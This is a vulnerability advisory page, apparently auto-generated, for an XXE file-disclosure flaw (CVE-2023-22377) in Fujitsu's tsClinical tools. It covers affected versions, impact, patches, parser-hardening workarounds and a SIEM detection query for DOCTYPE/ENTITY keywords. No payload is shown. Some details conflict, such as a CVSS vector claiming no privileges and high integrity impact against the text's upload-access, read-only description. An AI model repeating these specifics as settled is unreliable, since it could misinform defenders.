CVE-2023-22377 – This XXE vulnerability in tsClinical software a... (How to Fix)

Q: What is the severity of CVE-2023-22377?

CVE-2023-22377 has a CVSS score of 7.4 (HIGH). This XXE vulnerability in tsClinical software allows attackers to read arbitrary files on the system by processing specially crafted XML files. It affects all users of tsClinical Define.xml Generator versions 1.0.0-1.4.0 and tsClinical Metadata Desktop Tools versions 1.0.3-1.1.0 who process untrusted XML input.

📋 TL;DR

This XXE vulnerability in tsClinical software allows attackers to read arbitrary files on the system by processing specially crafted XML files. It affects all users of tsClinical Define.xml Generator versions 1.0.0-1.4.0 and tsClinical Metadata Desktop Tools versions 1.0.3-1.1.0 who process untrusted XML input.

💻 Affected Systems

Products:

tsClinical Define.xml Generator
tsClinical Metadata Desktop Tools

Versions: Define.xml Generator: v1.0.0 to v1.4.0; Metadata Desktop Tools: v1.0.3 to v1.1.0

Operating Systems: All platforms running affected software

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists when processing XML files; all default configurations are vulnerable.

📦 What is this software?

Tsclinical Define.xml Generator by Fujitsu

View all CVEs affecting Tsclinical Define.xml Generator →

Tsclinical Metadata Desktop Tools by Fujitsu

View all CVEs affecting Tsclinical Metadata Desktop Tools →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise through sensitive file disclosure (passwords, configuration files, SSH keys) leading to lateral movement or data exfiltration.

🟠

Likely Case

Unauthorized reading of sensitive files containing application data, credentials, or system information.

🟢

If Mitigated

Limited impact with proper XML parsing configuration and input validation in place.

🌐 Internet-Facing: MEDIUM - Requires XML file upload/processing capability, but many deployments may be internal.

🏢 Internal Only: HIGH - Internal users with access to upload XML files could exploit this to read sensitive system files.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires ability to submit XML files to the application; no authentication bypass needed beyond file upload access.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Define.xml Generator: v1.4.1 or later; Metadata Desktop Tools: v1.1.1 or later

Vendor Advisory: https://github.com/tsClinical/tsc-desktop/security/advisories

Restart Required: Yes

Instructions:

1. Download latest version from official source. 2. Backup configuration and data. 3. Uninstall old version. 4. Install patched version. 5. Restart system/services.

🔧 Temporary Workarounds

Disable XXE in XML parser

all

Configure XML parser to disable external entity processing

Set FEATURE_SECURE_PROCESSING = true
Set XMLConstants.FEATURE_SECURE_PROCESSING = true
Disable DTD processing

Input validation and sanitization

all

Implement strict validation of XML input before processing

Validate XML against schema
Reject XML with DOCTYPE declarations
Use whitelist for allowed XML elements

🧯 If You Can't Patch

Restrict XML file uploads to trusted sources only
Implement network segmentation to isolate vulnerable systems from sensitive data

🔍 How to Verify

Check if Vulnerable:

Check application version against affected ranges; test with XXE payload in XML file upload.

Check Version:

Check application About menu or configuration files for version information

Verify Fix Applied:

Verify version is patched (v1.4.1+ for Define.xml Generator, v1.1.1+ for Metadata Tools); test with XXE payload that should be rejected.

📡 Detection & Monitoring

Log Indicators:

Unusual file access patterns
XML parsing errors with external entity references
Large XML file uploads

Network Indicators:

XML file uploads containing DOCTYPE declarations
Outbound connections to unusual ports during XML processing

SIEM Query:

source="application_logs" AND ("DOCTYPE" OR "ENTITY" OR "SYSTEM") AND NOT "expected_xml_pattern"

📊 Metadata

CVE ID: CVE-2023-22377

CVSS v3 Score: 7.4 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE: CWE-611

Published: February 15, 2023

Last Updated: March 19, 2025

🔗 References

https://github.com/tsClinical/tsc-desktop/security/advisories Third Party Advisory
https://jvn.jp/en/jp/JVN00712821/ Third Party Advisory
https://github.com/tsClinical/tsc-desktop/security/advisories Third Party Advisory
https://jvn.jp/en/jp/JVN00712821/ Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-22377, you might also want to check these: